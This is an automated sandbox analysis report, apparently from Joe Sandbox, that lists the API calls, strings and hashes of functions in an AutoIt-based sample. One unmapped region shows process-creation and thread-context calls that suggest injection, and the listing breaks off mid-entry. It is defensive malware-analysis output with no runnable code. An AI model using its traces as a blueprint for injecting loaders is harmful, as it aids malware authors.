                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: bee5ab7fc79f76d14756f6aa6edc60f4b092fe42f722c16d1849ad6fa70a577a
                                                                                • Instruction ID: 7b1a70707bd2e57b6bd3b080bcc8f785dc251fd87a641f981e56c556cef2949c
                                                                                • Opcode Fuzzy Hash: bee5ab7fc79f76d14756f6aa6edc60f4b092fe42f722c16d1849ad6fa70a577a
                                                                                • Instruction Fuzzy Hash: BC21D8B5D00358AFDB00DFA8EC89BCDBBB4FB08714F00512AF525A62A0D7B54584CF99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 003B37B3
                                                                                • KillTimer.USER32(?,00000001), ref: 003B37DD
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003B3800
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B380B
                                                                                • CreatePopupMenu.USER32 ref: 003B381F
                                                                                • PostQuitMessage.USER32(00000000), ref: 003B382E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: 70e14273464763a8d792d670243f4f3fded32a41ecbb46b95215b3ea02c648dd
                                                                                • Instruction ID: 2de1428a5f18041205f9f48b2ace12f2391cbb259a6585216984e54a4549dee7
                                                                                • Opcode Fuzzy Hash: 70e14273464763a8d792d670243f4f3fded32a41ecbb46b95215b3ea02c648dd
                                                                                • Instruction Fuzzy Hash: 1F4155F52002A5ABDB165F6CAC4BBFA3659FB00304F404126F716D6DB0CF649E80836A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 003B3E79
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 003B3E88
                                                                                • LoadIconW.USER32(00000063), ref: 003B3E9E
                                                                                • LoadIconW.USER32(000000A4), ref: 003B3EB0
                                                                                • LoadIconW.USER32(000000A2), ref: 003B3EC2
                                                                                  • Part of subcall function 003B4024: LoadImageW.USER32(003B0000,00000063,00000001,00000010,00000010,00000000), ref: 003B4048
                                                                                • RegisterClassExW.USER32(?), ref: 003B3F30
                                                                                  • Part of subcall function 003B3F53: GetSysColorBrush.USER32(0000000F), ref: 003B3F86
                                                                                  • Part of subcall function 003B3F53: RegisterClassExW.USER32(00000030), ref: 003B3FB0
                                                                                  • Part of subcall function 003B3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B3FC1
                                                                                  • Part of subcall function 003B3F53: InitCommonControlsEx.COMCTL32(?), ref: 003B3FDE
                                                                                  • Part of subcall function 003B3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B3FEE
                                                                                  • Part of subcall function 003B3F53: LoadIconW.USER32(000000A9), ref: 003B4004
                                                                                  • Part of subcall function 003B3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B4013
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: 4a0397da6b922feb49e07ddb068179e8f479e5f6374a86dc6c1cd1e38baa736d
                                                                                • Instruction ID: f3edb5cdc6f32a303f0588e424c8041d695e90b40bff58d2fc0dde917b19aeb0
                                                                                • Opcode Fuzzy Hash: 4a0397da6b922feb49e07ddb068179e8f479e5f6374a86dc6c1cd1e38baa736d
                                                                                • Instruction Fuzzy Hash: 5E2159B0E00354ABCB11DFADEC4AA99BBF5FB48314F50413AE218A62B1D7754680DF99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01009C01
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01009E27
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                • Instruction ID: f62ca573bae5c04a77629ae2d7e91cfde51c6eefdc3d64e6d86bbc1a1e89b4d2
                                                                                • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                • Instruction Fuzzy Hash: FDA11A70E40209EBEB15DF94C894BEEBBB5BF48308F108599E245BB2C1D7759A40CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003B4A1D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004241DB
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0042421A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00424249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                • API String ID: 1586453840-614718249
                                                                                • Opcode ID: f823952dc57c93204f7eacd715c170272ae4ba20d9ff76989721d99e39530150
                                                                                • Instruction ID: ed38d11c97c25a935fc025f78d7638c7dedfea6ec1be06e996262740c155ad32
                                                                                • Opcode Fuzzy Hash: f823952dc57c93204f7eacd715c170272ae4ba20d9ff76989721d99e39530150
                                                                                • Instruction Fuzzy Hash: 4A116D71A00108BEEB05ABA4DD86EFF7BBCEF04748F100069B502D6191EA749E01D754

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003B36E6
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003B3707
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B371B
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B3724
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: 653316fd9acf6ff69db12021cf84a82d15bae3ca3306583579354764ca5bfc08
                                                                                • Instruction ID: 12dcaa157ecbdf540210e4fc1a6228b6f66cb6672d2f63ab1ce154d2b9cfd09a
                                                                                • Opcode Fuzzy Hash: 653316fd9acf6ff69db12021cf84a82d15bae3ca3306583579354764ca5bfc08
                                                                                • Instruction Fuzzy Hash: E5F0FE719402D07AE731676BAC49E773E7DD7C6F20F00403FBA08A25B0C66508D5DAB9

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 01009790: Sleep.KERNELBASE(000001F4), ref: 010097A1
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01009A23
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: H0NXFDJ7Q57GHFRIIHUXJMC668E
                                                                                • API String ID: 2694422964-3801579314
                                                                                • Opcode ID: be27c86057938952499a7e8dc8b2a83062a1872b939542fbb252d8a4bd681578
                                                                                • Instruction ID: afd16ce8efab1c10c97789d996b11a52036b6e34b88ba768b351d947d946aec9
                                                                                • Opcode Fuzzy Hash: be27c86057938952499a7e8dc8b2a83062a1872b939542fbb252d8a4bd681578
                                                                                • Instruction Fuzzy Hash: 86717370D04288DAEF12DBE4C854BEEBB75AF19304F044099D248BB2C1D7BA0B45CBA6

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 003B5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00471148,?,003B61FF,?,00000000,00000001,00000000), ref: 003B5392
                                                                                  • Part of subcall function 003B49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003B4A1D
                                                                                • _wcscat.LIBCMT ref: 00422D80
                                                                                • _wcscat.LIBCMT ref: 00422DB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                                • String ID: 8!G$\$\Include\
                                                                                • API String ID: 3592542968-2847565545
                                                                                • Opcode ID: 05f18f9407820d20745301de4b50dfcdea2d9bd119c8726bcf1ca0e9cd11d785
                                                                                • Instruction ID: ea82bba06b1658bae3d6a16f3166a1786700344530da3437517c5b47bc2eb9ec
                                                                                • Opcode Fuzzy Hash: 05f18f9407820d20745301de4b50dfcdea2d9bd119c8726bcf1ca0e9cd11d785
                                                                                • Instruction Fuzzy Hash: B851A3725143409FC315EF59EA8299AB3F4FF49304FC0493EF28897661EBB49684CB5A
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003B522F
                                                                                • _wcscpy.LIBCMT ref: 003B5283
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003B5293
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00423CB0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 1053898822-1585850449
                                                                                • Opcode ID: bad684de66dc4874015a22e3ad79d53892d2c13a3b6e4832aaa9044767849b9e
                                                                                • Instruction ID: 39dceb3a74206ac2f270e56fbb761e95e224751584c8d42308b85cac4753105c
                                                                                • Opcode Fuzzy Hash: bad684de66dc4874015a22e3ad79d53892d2c13a3b6e4832aaa9044767849b9e
                                                                                • Instruction Fuzzy Hash: 9631E6715083446ED722EF64EC42FDE77D8AB44304F00451FF6899A9A2DB74A648CB9A
                                                                                APIs
                                                                                  • Part of subcall function 003B41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003B39FE,?,00000001), ref: 003B41DB
                                                                                • _free.LIBCMT ref: 004236B7
                                                                                • _free.LIBCMT ref: 004236FE
                                                                                  • Part of subcall function 003BC833: __wsplitpath.LIBCMT ref: 003BC93E
                                                                                  • Part of subcall function 003BC833: _wcscpy.LIBCMT ref: 003BC953
                                                                                  • Part of subcall function 003BC833: _wcscat.LIBCMT ref: 003BC968
                                                                                  • Part of subcall function 003BC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003BC978
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                • API String ID: 805182592-1757145024
                                                                                • Opcode ID: 1a42bdf6a41597735737eee22f46906601a3f0bb318d1691a1bcc40087408d94
                                                                                • Instruction ID: 338d15b0e99905b90fb7082c593b9ead8fcbfbf605068e6625f37ce5a09db81e
                                                                                • Opcode Fuzzy Hash: 1a42bdf6a41597735737eee22f46906601a3f0bb318d1691a1bcc40087408d94
                                                                                • Instruction Fuzzy Hash: 9891B171A10229EFCF15EFA4DC81AEEB7B4FF08314F50442AF516AB291DB389A45CB54
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00423725
                                                                                • GetOpenFileNameW.COMDLG32 ref: 0042376F
                                                                                  • Part of subcall function 003B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B53B1,?,?,003B61FF,?,00000000,00000001,00000000), ref: 003B662F
                                                                                  • Part of subcall function 003B40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B40C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                • String ID: X$t3F
                                                                                • API String ID: 3777226403-3644656231
APIs
• __getstream.LIBCMT ref: 003D34FE
  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
• @_EH4_CallFilterFunc@8.LIBCMT ref: 003D3539
• __wopenfile.LIBCMT ref: 003D3549
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
• String ID: <G
• API String ID: 1820251861-2138716496
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003CD28B,SwapMouseButtons,00000004,?), ref: 003CD2BC
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003CD28B,SwapMouseButtons,00000004,?,?,?,?,003CC865), ref: 003CD2DD
• RegCloseKey.KERNELBASE(00000000,?,?,003CD28B,SwapMouseButtons,00000004,?,?,?,?,003CC865), ref: 003CD2FF
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01008F4B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01008FE1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01009003
Memory Dump Source
• Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
  • Part of subcall function 003B4517: _fseek.LIBCMT ref: 003B452F
  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC65D
  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC670
• _free.LIBCMT ref: 003FC4DD
• _free.LIBCMT ref: 003FC4E4
• _free.LIBCMT ref: 003FC54F
  • Part of subcall function 003D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003D7A85), ref: 003D1CB1
  • Part of subcall function 003D1C9D: GetLastError.KERNEL32(00000000,?,003D7A85), ref: 003D1CC3
• _free.LIBCMT ref: 003FC557
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 003FC72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003FC746
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• _memset.LIBCMT ref: 003B5022
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B50CB
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
APIs
• __FF_MSGBANNER.LIBCMT ref: 003D3973
  • Part of subcall function 003D81C2: __NMSG_WRITE.LIBCMT ref: 003D81E9
  • Part of subcall function 003D81C2: __NMSG_WRITE.LIBCMT ref: 003D81F3
• __NMSG_WRITE.LIBCMT ref: 003D397A
  • Part of subcall function 003D821F: GetModuleFileNameW.KERNEL32(00000000,00470312,00000104,00000000,00000001,00000000), ref: 003D82B1
  • Part of subcall function 003D821F: ___crtMessageBoxW.LIBCMT ref: 003D835F
  • Part of subcall function 003D1145: ___crtCorExitProcess.LIBCMT ref: 003D114B
  • Part of subcall function 003D1145: ExitProcess.KERNEL32 ref: 003D1154
  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
• RtlAllocateHeap.NTDLL(00F30000,00000000,00000001,00000001,00000000,?,?,003CF507,?,0000000E), ref: 003D399F
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003FC385,?,?,?,?,?,00000004), ref: 003FC6F2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003FC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003FC708
• CloseHandle.KERNEL32(00000000,?,003FC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003FC70F
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 003FBB72
  • Part of subcall function 003D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003D7A85), ref: 003D1CB1
  • Part of subcall function 003D1C9D: GetLastError.KERNEL32(00000000,?,003D7A85), ref: 003D1CC3
• _free.LIBCMT ref: 003FBB83
• _free.LIBCMT ref: 003FBB95
Memory Dump Source
